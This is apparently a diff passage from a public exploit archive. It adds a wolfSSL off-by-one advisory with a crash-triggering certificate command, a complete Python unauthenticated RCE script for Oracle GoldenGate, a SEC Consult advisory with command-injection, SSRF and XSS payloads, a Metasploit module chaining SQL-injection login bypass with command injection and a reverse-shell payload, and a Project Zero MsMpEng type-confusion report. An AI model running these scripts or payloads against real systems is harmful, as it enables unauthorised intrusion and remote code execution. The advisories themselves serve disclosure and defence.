int wolfSSL_X509_NAME_get_text_by_NID(WOLFSSL_X509_NAME* name, int nid, char* buf, int len);
|
||||
|
||||
Its task is to copy the appropriate string from name context into supplied buf of length len. The issue happens when the string is longer or equal to length of the allocated buffer.
|
||||
Following code highlights the issue for the case of commonName field:
|
||||
|
||||
|
||||
int wolfSSL_X509_NAME_get_text_by_NID(WOLFSSL_X509_NAME* name,
|
||||
int nid, char* buf, int len)
|
||||
{
|
||||
char *text = NULL;
|
||||
int textSz = 0;
|
||||
|
||||
|
||||
WOLFSSL_ENTER("wolfSSL_X509_NAME_get_text_by_NID");
|
||||
|
||||
|
||||
switch (nid) {
|
||||
case ASN_COMMON_NAME:
|
||||
text = name->fullName.fullName + name->fullName.cnIdx; [1]
|
||||
textSz = name->fullName.cnLen; [2]
|
||||
break;
|
||||
...
|
||||
|
||||
|
||||
if (buf != NULL && text != NULL) {
|
||||
textSz = min(textSz, len); [3]
|
||||
XMEMCPY(buf, text, textSz); [4]
|
||||
buf[textSz] = '\0'; [5]
|
||||
}
|
||||
|
||||
|
||||
At [1] and [2], text and textSz are initialized. At [3] the lesser of the two values textSz and len is chosen. This value ends up as the size parameter to a memcpy call at [4]. Then, the same value is used as an index to NULL terminate the string at [5]. If the string length is bigger than size of the allocated buffer, NULL termination at index textSz will cause an off-by-one NULL byte write into adjacent memory variable on the stack or heap, depending on where the buffer was allocated.
|
||||
|
||||
Depending on the way the library is used, this could lead to further issues when doing certificate validation or potentially result in remote code execution.
|
||||
The vulnerability can be triggered by supplying the attached PoC x509 certificate to the certfileds example app from wolfssl-examples.
|
||||
|
||||
CRASH INFORMATION
|
||||
Address sanitizer output:
|
||||
|
||||
==97602==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffe1a0 at pc 0x7ffff7b73f56 bp 0x7fffffff8410 sp 0x7fffffff8408
|
||||
WRITE of size 1 at 0x7fffffffe1a0 thread T0
|
||||
#0 0x7ffff7b73f55 in wolfSSL_X509_NAME_get_text_by_NID wolfssl/src/ssl.c:12458
|
||||
#1 0x7ffff7b73f55 in ?? ??:0
|
||||
#2 0x4ea99d in main wolfssl/wolfssl-examples/certfields/main.c:128
|
||||
#3 0x4ea99d in ?? ??:0
|
||||
#4 0x7ffff6afe82f in __libc_start_main /build/glibc-Qz8a69/glibc-2.23/csu/../csu/libc-start.c:291
|
||||
#5 0x7ffff6afe82f in ?? ??:0
|
||||
#6 0x418c48 in _start ??:?
|
||||
#7 0x418c48 in ?? ??:0
|
||||
|
||||
|
||||
Address 0x7fffffffe1a0 is located in stack of thread T0 at offset 23872 in frame
|
||||
#0 0x4ea2af in main wolfssl/wolfssl-examples/certfields/main.c:44
|
||||
#1 0x4ea2af in ?? ??:0
|
||||
|
||||
|
||||
This frame has 10 object(s):
|
||||
[32, 14128) 'derCert'
|
||||
[14384, 14388) 'idx'
|
||||
[14400, 23280) 'pubKey'
|
||||
[23536, 23544) 'cert'
|
||||
[23568, 23648) 'commonName'
|
||||
[23680, 23760) 'countryName'
|
||||
[23792, 23872) 'localityName' <== Memory access at offset 23872 overflows this variable
|
||||
[23904, 23984) 'stateName'
|
||||
[24016, 24096) 'orgName'
|
||||
[24128, 24208) 'orgUnit'
|
||||
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
|
||||
(longjmp and C++ exceptions *are* supported)
|
||||
SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/local/lib/libwolfssl.so.3+0x184f55)
|
||||
Shadow bytes around the buggy address:
|
||||
0x10007fff7be0: 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2
|
||||
0x10007fff7bf0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
|
||||
0x10007fff7c00: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 f2 f2 f2 00 00
|
||||
0x10007fff7c10: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00
|
||||
0x10007fff7c20: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00
|
||||
=>0x10007fff7c30: 00 00 00 00[f2]f2 f2 f2 00 00 00 00 00 00 00 00
|
||||
0x10007fff7c40: 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00
|
||||
0x10007fff7c50: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 f3 f3
|
||||
0x10007fff7c60: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10007fff7c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10007fff7c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
Container overflow: fc
|
||||
Array cookie: ac
|
||||
Intra object redzone: bb
|
||||
ASan internal: fe
|
||||
Left alloca redzone: ca
|
||||
Right alloca redzone: cb
|
||||
==97602==ABORTING
|
||||
|
||||
EXPLOIT PROOF-OF-CONCEPT
|
||||
A certificate that triggers this vulnerability can be generated using the following openssl command:
|
||||
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert1.pem -days 365 -subj "/C=US/ST=Maryland/L=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/O=E/CN=A"
|
||||
|
||||
CREDIT
|
||||
Discovered by Aleksandar Nikolic of Cisco Talos.
|
||||
|
||||
TIMELINE
|
||||
2017-03-14 - Vendor Disclosure
|
||||
2017-05-04 - Public Release
|
139
platforms/multiple/remote/41978.py
Executable file
139
platforms/multiple/remote/41978.py
Executable file
|
@ -0,0 +1,139 @@
|
|||
#!/usr/bin/env python
|
||||
# Sources:
|
||||
# https://silentsignal.hu/docs/S2_Oracle_GoldenGate_GOLDENSHOWER.py
|
||||
# https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/
|
||||
#
|
||||
# GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal
|
||||
#
|
||||
# Tested with:
|
||||
# Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0_PLATFORMS_130924.1316 Linux, x64, 64bit (optimized) Oracle 11g
|
||||
# Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0T1_PLATFORMS_140313.1216 Windows x64 (optimized) Oracle 12c
|
||||
#
|
||||
# Nmap service fingerprint example:
|
||||
# ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)========
|
||||
# SF-Port7809-TCP:V=7.12%I=7%D=2/20%Time=DEADBEEF%P=x86_64-unknown-linux-gnu
|
||||
# SF:%r(RPCCheck,2D,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20th
|
||||
# SF:e\x20command\.\0")%r(DNSVersionBindReq,28,"\0&\x20\x20ERROR\tMGR\x20Did
|
||||
# SF:\x20Not\x20Recognize\x20Command\0")%r(DNSStatusRequest,28,"\0&\x20\x20E
|
||||
# SF:RROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(afp,28,"\0&\x20\x
|
||||
# SF:20ERROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(kumo-server,2D
|
||||
# SF:,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20the\x20command\.
|
||||
# SF:\0");
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import argparse
|
||||
|
||||
HOST = None
|
||||
PORT = None
|
||||
PLATFORM = None
|
||||
|
||||
|
||||
def send_write(cmd):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
|
||||
term_ch = "#"
|
||||
if PLATFORM == "win":
|
||||
term_ch = "&"
|
||||
|
||||
cmd_ggsci = "GGSCI START OBEY x\nSHELL,%s %s " % (cmd, term_ch)
|
||||
cmd_ggsci = cmd_ggsci.replace(" ", "\x09")
|
||||
|
||||
length = struct.pack(">H", len(cmd_ggsci))
|
||||
s.send(length + cmd_ggsci)
|
||||
r = s.recv(1024)
|
||||
print "[+] '%s' WRITTEN \nReceived: %s\n" % (cmd, repr(r))
|
||||
|
||||
s.close()
|
||||
|
||||
|
||||
def send_exec():
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
cmd = "GGSCI START OBEY ggserr.log".replace(" ", "\x09")
|
||||
length = struct.pack(">H", len(cmd))
|
||||
s.send(length + cmd)
|
||||
r = s.recv(1024)
|
||||
print "[+] EXECUTED - Received: %s\n" % (repr(r))
|
||||
s.close()
|
||||
|
||||
|
||||
def monitor():
|
||||
if PLATFORM == "win":
|
||||
print "[!] Windows platform detected, this may not work!"
|
||||
|
||||
import requests
|
||||
paths = ["messages", "registry", "statuschanges", "mpoints"]
|
||||
for p in paths:
|
||||
r = requests.get("http://%s:%d/%s" % (HOST, PORT, p))
|
||||
print "\n--- MONITOR - %s ---" % (p)
|
||||
print r.text
|
||||
|
||||
|
||||
def version():
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
#cmd = "GGSCI VERSION".replace(" ","\x09")
|
||||
cmd = "GGSCI\tVERSION"
|
||||
length = struct.pack(">H", len(cmd))
|
||||
s.send(length + cmd)
|
||||
r = s.recv(1024)
|
||||
ver = r[5:].replace("\t", " ")
|
||||
print "[+] VERSION: %s\n" % (ver)
|
||||
s.close()
|
||||
return ver
|
||||
|
||||
|
||||
def debug(cmd, l=None):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
length = None
|
||||
if l is None:
|
||||
length = struct.pack(">H", len(cmd))
|
||||
else:
|
||||
length = struct.pack(">H", l)
|
||||
s.send(length + cmd)
|
||||
print "[+] Sent: %s" % (repr(length + cmd))
|
||||
r = s.recv(1024)
|
||||
print "[+] Received: %s\n" % (repr(r))
|
||||
s.close()
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser(
|
||||
description='GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal')
|
||||
parser.add_argument("--host", help="Target host")
|
||||
parser.add_argument("--port", help="Target port", type=int, default=7809)
|
||||
parser.add_argument("--cmd", help="Command(s) to execute", nargs='*')
|
||||
parser.add_argument(
|
||||
"--monitor", help="Dump information (incl. version) via HTTP monitoring functions", action="store_true")
|
||||
parser.add_argument("--debugcmd", help="Send raw content", required=False)
|
||||
parser.add_argument("--debuglen", help="Indicated size of raw content",
|
||||
type=int, default=None, required=False)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
HOST = args.host
|
||||
PORT = args.port
|
||||
|
||||
ver = version()
|
||||
|
||||
if "Windows" in ver:
|
||||
PLATFORM = "win"
|
||||
print "[+] Platform: Windows"
|
||||
else:
|
||||
PLATFORM = "nix"
|
||||
print "[+] Platform: *nix"
|
||||
|
||||
if args.cmd:
|
||||
for c in args.cmd:
|
||||
send_write(c)
|
||||
send_exec()
|
||||
|
||||
if args.monitor:
|
||||
monitor()
|
||||
|
||||
if args.debugcmd:
|
||||
debug(args.debugcmd, args.debuglen)
|
||||
|
||||
# Signature: aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj0wNHZINFdfOVJmZw==
|
167
platforms/php/webapps/41979.txt
Executable file
167
platforms/php/webapps/41979.txt
Executable file
|
@ -0,0 +1,167 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20170509-0 >
|
||||
=======================================================================
|
||||
title: Multiple vulnerabilities
|
||||
product: I, Librarian PDF manager
|
||||
vulnerable version: <=4.6 & 4.7
|
||||
fixed version: 4.8
|
||||
CVE number: -
|
||||
impact: Critical
|
||||
homepage: https://i-librarian.net/
|
||||
found: 2017-01-30
|
||||
by: Wan Ikram (Office Kuala Lumpur)
|
||||
Fikri Fadzil (Office Kuala Lumpur)
|
||||
Jasveer Singh (Office Kuala Lumpur)
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
An integrated part of SEC Consult
|
||||
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
|
||||
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
https://www.sec-consult.com
|
||||
|
||||
=======================================================================
|
||||
|
||||
Vendor description:
|
||||
-------------------
|
||||
"I, Librarian is a PDF manager or PDF organizer, which enables researchers,
|
||||
scholars, or students to create an annotated collection of PDF articles. If
|
||||
used as a groupware, users may build their virtual library collaboratively,
|
||||
sharing the workload of literature mining. I, Librarian will make your work
|
||||
with scientific literature incredibly efficient."
|
||||
|
||||
Source: https://i-librarian.net/
|
||||
|
||||
|
||||
Business recommendation:
|
||||
------------------------
|
||||
By combining the vulnerabilities documented in this advisory an attacker can
|
||||
fully compromise the web server which has the "I, Librarian" software installed.
|
||||
|
||||
SEC Consult recommends to install the latest version available immediately and
|
||||
perform a thorough security review of this software.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
The application doesn't apply proper validation on some user inputs. As a
|
||||
result, below vulnerabilities can be exploited by authenticated attackers with
|
||||
any roles to fully compromise the system.
|
||||
|
||||
1. OS Command Injection
|
||||
Arbitrary OS commands are possible to be executed from "batchimport.php". This
|
||||
is a serious vulnerability as the chances for the web server to be fully
|
||||
compromised are very high.
|
||||
|
||||
2. Server-Side Request Forgery
|
||||
This vulnerability allows an attacker to send HTTP requests originating from the
|
||||
web server. As some functions in the web application require requests to
|
||||
be done from localhost, the risk for this vulnerability is considered high.
|
||||
|
||||
3. Directory Enumeration
|
||||
It is possible to enumerate all directories in any directory on the server through
|
||||
"jqueryFileTree.php".
|
||||
|
||||
4. Reflected Cross Site Scripting
|
||||
This vulnerability was found in "temp.php". It allows an attacker to inject
|
||||
malicious client side scripting which will be executed in the browser of users
|
||||
if they visit the manipulated site.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1. OS Command Injection
|
||||
Below is the detail of a HTTP request that needs to be sent to execute arbitrary
|
||||
OS commands through "batchimport.php":
|
||||
|
||||
URL : http://$DOMAIN/batchimport.php
|
||||
METHOD : GET
|
||||
PAYLOAD : directory=.&commence=&user="||<os-commands-here>||"
|
||||
|
||||
|
||||
2. Server-Side Request Forgery
|
||||
Below shows an example of the exploitation for this vulnerability. An attacker
|
||||
can reset any user's password which by design requires the request to be sent
|
||||
from localhost.
|
||||
|
||||
URL : http://$DOMAIN/ajaxsupplement.php
|
||||
METHOD : POST
|
||||
PAYLOAD :
|
||||
form_new_file_link=http://$DOMAIN/resetpassword.php?username=<username>&new_password1=<new-password>&new_password2=<new-password>
|
||||
|
||||
|
||||
3. Directory Enumeration
|
||||
Available directories can be enumerated simply by navigating through the "dir"
|
||||
parameter in "jqueryFileTree.php".
|
||||
|
||||
URL : http://$DOMAIN/jqueryFileTree.php
|
||||
METHOD : POST
|
||||
PAYLOAD : dir=<path-to-directory>
|
||||
|
||||
|
||||
4. Reflected Cross Site Scripting
|
||||
The following payload shows a simple alert message box:
|
||||
URL : http://$DOMAIN/temp.php
|
||||
METHOD : GET
|
||||
PAYLOAD : tempfile=<script>alert(42)</script>
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
-----------------------------
|
||||
"I, Librarian" version 4.6 has been tested. This version was the latest
|
||||
at the time the security vulnerabilities were discovered. It is assumed
|
||||
that previous versions are affected as well.
|
||||
|
||||
|
||||
Vendor contact timeline:
|
||||
------------------------
|
||||
2017-01-31: Contacting vendor through support@i-librarian.net
|
||||
2017-01-31: Vendor replied with their PGP public key.
|
||||
2017-02-03: Provided encrypted advisory and proof of concept to the vendor.
|
||||
2017-02-09: Patch released, version 4.7.
|
||||
2017-02-21: Informed vendor on some issues which were not addressed correctly.
|
||||
2017-03-30: Patch released by the vendor - I, Librarian version 4.8.
|
||||
2017-05-09: Public release of advisory
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
Upgrade to I, Librarian 4.8
|
||||
|
||||
For further information see:
|
||||
https://i-librarian.net/article.php?id=9
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
None
|
||||
|
||||
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
|
||||
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
SEC Consult
|
||||
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
|
||||
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
About SEC Consult Vulnerability Lab
|
||||
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
|
||||
ensures the continued knowledge gain of SEC Consult in the field of network
|
||||
and application security to stay ahead of the attacker. The SEC Consult
|
||||
Vulnerability Lab supports high-quality penetration testing and the evaluation
|
||||
of new offensive and defensive technologies for our customers. Hence our
|
||||
customers obtain the most current information about vulnerabilities and valid
|
||||
recommendation about the risk profile of new technologies.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Interested to work with the experts of SEC Consult?
|
||||
Send us your application https://www.sec-consult.com/en/Career.htm
|
||||
|
||||
Interested in improving your cyber security with the experts of SEC Consult?
|
||||
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
112
platforms/python/remote/41980.rb
Executable file
112
platforms/python/remote/41980.rb
Executable file
|
@ -0,0 +1,112 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Crypttech CryptoLog Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a
|
||||
terminal command under the context of the web user.
|
||||
|
||||
login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
|
||||
and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
|
||||
|
||||
logshares_ajax.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having
|
||||
a valid session. One user parameter is used by the application while executing operating system command which cause a command injection issue.
|
||||
|
||||
Combining these vulnerabilities gives us opportunity execute operation system command under the context of the web user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 3 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def bypass_login
|
||||
r = rand_text_alpha(15)
|
||||
i = rand_text_numeric(5)
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
|
||||
'vars_get' => {
|
||||
'act' => 'login'
|
||||
},
|
||||
'vars_post' => {
|
||||
'user' => "' OR #{i}=#{i}#",
|
||||
'pass' => "#{r}"
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 302 && res.headers.include?('Set-Cookie')
|
||||
res.get_cookies
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
if bypass_login.nil?
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Bypassing login by exploiting SQLi flaw")
|
||||
|
||||
cookie = bypass_login
|
||||
|
||||
if cookie.nil?
|
||||
fail_with(Failure::Unknown, "Something went wrong.")
|
||||
end
|
||||
|
||||
print_good("Successfully logged in")
|
||||
|
||||
print_status("Exploiting command injection flaw")
|
||||
r = rand_text_alpha(15)
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'),
|
||||
'cookie' => cookie,
|
||||
'vars_post' => {
|
||||
'opt' => "check",
|
||||
'lsid' => "$(python -c \"#{payload.encoded}\")",
|
||||
'lssharetype' => "#{r}"
|
||||
}
|
||||
})
|
||||
|
||||
end
|
||||
end
|
|
@ -6,6 +6,7 @@
|
|||
# Contact: https://www.linkedin.com/in/majidalqabandi/
|
||||
# CVE: CVE-2017-6953
|
||||
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
|
||||
# Vendor notified: 17-04-2016
|
||||
|
||||
1. Description
|
||||
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
|
||||
|
|
129
platforms/windows/remote/41975.txt
Executable file
129
platforms/windows/remote/41975.txt
Executable file
|
@ -0,0 +1,129 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5
|
||||
|
||||
MsMpEng is the Malware Protection service that is enabled by default on Windows 8, 8.1, 10, Windows Server 2012, and so on. Additionally, Microsoft Security Essentials, System Centre Endpoint Protection and various other Microsoft security products share the same core engine. MsMpEng runs as NT AUTHORITY\SYSTEM without sandboxing, and is remotely accessible without authentication via various Windows services, including Exchange, IIS, and so on.
|
||||
|
||||
On workstations, attackers can access mpengine by sending emails to users (reading the email or opening attachments is not necessary), visiting links in a web browser, instant messaging and so on. This level of accessibility is possible because MsMpEng uses a filesystem minifilter to intercept and inspect all system filesystem activity, so writing controlled contents to anywhere on disk (e.g. caches, temporary internet files, downloads (even unconfirmed downloads), attachments, etc) is enough to access functionality in mpengine. MIME types and file extensions are not relevant to this vulnerability, as MsMpEng uses it's own content identification system.
|
||||
|
||||
Vulnerabilities in MsMpEng are among the most severe possible in Windows, due to the privilege, accessibility, and ubiquity of the service.
|
||||
|
||||
The core component of MsMpEng responsible for scanning and analysis is called mpengine. Mpengine is a vast and complex attack surface, comprising of handlers for dozens of esoteric archive formats, executable packers and cryptors, full system emulators and interpreters for various architectures and languages, and so on. All of this code is accessible to remote attackers.
|
||||
|
||||
NScript is the component of mpengine that evaluates any filesystem or network activity that looks like JavaScript. To be clear, this is an unsandboxed and highly privileged JavaScript interpreter that is used to evaluate untrusted code, by default on all modern Windows systems. This is as surprising as it sounds.
|
||||
|
||||
We have written a tool to access NScript via a command shell for testing, allowing us to explore and evaluate it:
|
||||
|
||||
$ mpscript
|
||||
main(): Please wait, initializing engine...
|
||||
main(): Ready, type javascript (history available, use arrow keys)
|
||||
> 6 * 9
|
||||
JavaScriptLog(): 54
|
||||
> document.location.hostname
|
||||
JavaScriptLog(): www.myserver.com
|
||||
> "abcd" + String.fromCharCode(0x3f)
|
||||
JavaScriptLog(): abcd?
|
||||
> /[y]e+(s|S)/.exec("yes")[0] // C++ regex engine running unsandboxed as SYSTEM on attacker controlled REGEX?
|
||||
JavaScriptLog(): yes
|
||||
> for (i in document) log(i)
|
||||
JavaScriptLog(): appendChild
|
||||
JavaScriptLog(): attributes
|
||||
JavaScriptLog(): childNodes
|
||||
JavaScriptLog(): createElement
|
||||
JavaScriptLog(): createTextNode
|
||||
JavaScriptLog(): getElementById
|
||||
JavaScriptLog(): getElementsByTagName
|
||||
JavaScriptLog(): write
|
||||
JavaScriptLog(): writeln
|
||||
JavaScriptLog(): referrer
|
||||
JavaScriptLog(): cookie
|
||||
JavaScriptLog(): location
|
||||
JavaScriptLog(): undefined
|
||||
> window.ScriptEngineBuildVersion
|
||||
JavaScriptLog(): [object Function]
|
||||
> window.ScriptEngineBuildVersion()
|
||||
JavaScriptLog(): 8831
|
||||
|
||||
We have discovered that the function JsDelegateObject_Error::toString() reads the "message" property from the this object, but fails to validate the type of the property before passing it to JsRuntimeState::triggerShortStrEvent().
|
||||
|
||||
In pseudocode, the code does something like this:
|
||||
|
||||
prophash = JsObject::genPropHash("message", 0);
|
||||
RuntimeState::getThisPtr(&thisptr)
|
||||
|
||||
if (JsObject::get(thisptr, prophash, &message)) {
|
||||
JsRuntimeState::triggerShortStrEvent("error_tostring", message);
|
||||
}
|
||||
|
||||
|
||||
The method assumes that message is a string, but it can be of any type, so this type confusion allows an attacker to pass arbitrary other objects. JsRuntimeState::triggerShortStrEvent() calls JsString::numBytes() on the passed object, which will invoke a method from the object's vtable.
|
||||
|
||||
int __fastcall JsString::numBytes(JsString this)
|
||||
{
|
||||
if ( this == 0x12 )
|
||||
return 0;
|
||||
if ( (this & 0x12) == 0x12 )
|
||||
return this >> 5;
|
||||
return this->vtbl->GetLength(this);
|
||||
}
|
||||
|
||||
Nscript supports "short" strings, with length and values contained in the handle and "long" strings with out-of-line memory. If the string is "long" (or appears to be due to type confusion), a vtable call is made to retrieve the length.
|
||||
|
||||
Integer handles are represented as four-byte values with the final bit set to one by the engine. The integer itself is left shifted by one bit, and the final bit set to create the handle. Handles to most objects, including strings are represented as the value of the pointer to the object with no modification. Therefore, this type confusion allows an integer to be specified and treated as pointer (though the bits need to shifted to get the correct value in the handle, and only odd pointer values are possible).
|
||||
|
||||
To reproduce this vulnerability, download the attached testcase. The debugging session below was captured after visiting a website that did this:
|
||||
|
||||
<a href="testcase.txt" download id=link>
|
||||
<script>
|
||||
document.getElementById("link").click();
|
||||
</script>
|
||||
|
||||
3: kd> !process
|
||||
PROCESS 8805fd28 SessionId: 0 Cid: 0afc Peb: 7ffdf000 ParentCid: 01c8
|
||||
DirBase: bded14e0 ObjectTable: bfb99640 HandleCount: 433.
|
||||
Image: MsMpEng.exe
|
||||
3: kd> !token -n
|
||||
_EPROCESS 8805fd28, _TOKEN 00000000
|
||||
TS Session ID: 0
|
||||
User: S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
|
||||
|
||||
3: kd> .lastevent
|
||||
Last event: Access violation - code c0000005 (first chance)
|
||||
debugger time: Fri May 5 18:22:14.740 2017 (UTC - 7:00)
|
||||
3: kd> r
|
||||
eax=00000010 ebx=1156c968 ecx=41414141 edx=115730f8 esi=68bd9100 edi=41414141
|
||||
eip=68b1f5f2 esp=0208e12c ebp=0208e134 iopl=0 nv up ei ng nz ac po cy
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
|
||||
mpengine!FreeSigFiles+0xec822:
|
||||
001b:68b1f5f2 8b07 mov eax,dword ptr [edi] ds:0023:41414141=????????
|
||||
3: kd> lmv mmpengine
|
||||
start end module name
|
||||
68790000 6917a000 mpengine (export symbols) mpengine.dll
|
||||
Loaded symbol image file: mpengine.dll
|
||||
Image path: c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{1C2B7358-645B-41D0-9E79-5FA3E5C4EB51}\mpengine.dll
|
||||
Image name: mpengine.dll
|
||||
Timestamp: Thu Apr 06 16:05:37 2017 (58E6C9C1)
|
||||
CheckSum: 00A1330D
|
||||
ImageSize: 009EA000
|
||||
Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4
|
||||
3: kd> u
|
||||
mpengine!FreeSigFiles+0xec822:
|
||||
001b:68b1f5f2 8b07 mov eax,dword ptr [edi]
|
||||
001b:68b1f5f4 56 push esi
|
||||
001b:68b1f5f5 8b7008 mov esi,dword ptr [eax+8]
|
||||
001b:68b1f5f8 8bce mov ecx,esi
|
||||
001b:68b1f5fa ff15c0450e69 call dword ptr [mpengine!MpContainerWrite+0x35f3a0 (690e45c0)]
|
||||
001b:68b1f600 8bcf mov ecx,edi
|
||||
001b:68b1f602 ffd6 call esi <--- Jump to attacker controlled address
|
||||
001b:68b1f604 5e pop esi
|
||||
|
||||
|
||||
Before executing JavaScript, mpengine uses a number of heuristics to decide if evaluation is necessary. One such heuristic estimates file entropy before deciding whether to evaluate any javascript, but we've found that appending some complex comments is enough to trigger this.
|
||||
|
||||
The attached proof of concept demonstrates this, but please be aware that downloading it will immediately crash MsMpEng in it's default configuration and possibly destabilize your system. Extra care should be taken sharing this report with other Windows users via Exchange, or web services based on IIS, and so on.
|
||||
|
||||
As mpengine will unpack arbitrarily deeply nested archives and supports many obscure and esoteric archive formats (such as Amiga ZOO and MagicISO UIF), there is no practical way to identify an exploit at the network level, and administrators should patch as soon as is practically possible.
|
||||
|
||||
